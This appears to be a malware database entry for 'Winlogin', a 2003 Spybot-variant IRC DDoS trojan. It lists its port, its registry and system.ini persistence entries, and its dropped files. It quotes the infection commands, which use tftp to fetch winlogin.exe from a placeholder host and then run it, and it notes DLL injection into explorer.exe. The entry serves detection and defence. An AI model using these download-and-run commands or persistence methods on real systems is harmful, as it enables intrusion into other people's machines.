Winlogin
Released August 2003
Copyright © MegaSecurity
By ?
Information
Author | ?
Family | Winlogin
Category | Remote Access
Version | Winlogin
Released Date | Aug 2003
Additional Information
Server:
port: 113 TCP
startup:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce "winlogon"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "NDplDeamon"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "winlogon"
c:\windows\system.ini, [boot] "shell"
added:
c:\WINDOWS\SYSTEM\winlogin.exe
c:\WINDOWS\SYSTEM\yuetyutr.dll (Backdoor.SdBot.au)
c:\WINDOWS\TEMP\vhbmhbze.txt
remarks:
A variant of the Spybot IRC DDoS zombie.
The trojan infects a system using the RPC/DCOM exploit shellcode.
It runs the following commands:
C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe
C:\WINNT\system32>start winlogin.exe
C:\WINNT\system32>winlogin.exe
The dropped yuetyutr.dll is injected into the explorer.exe process by winlogin.exe.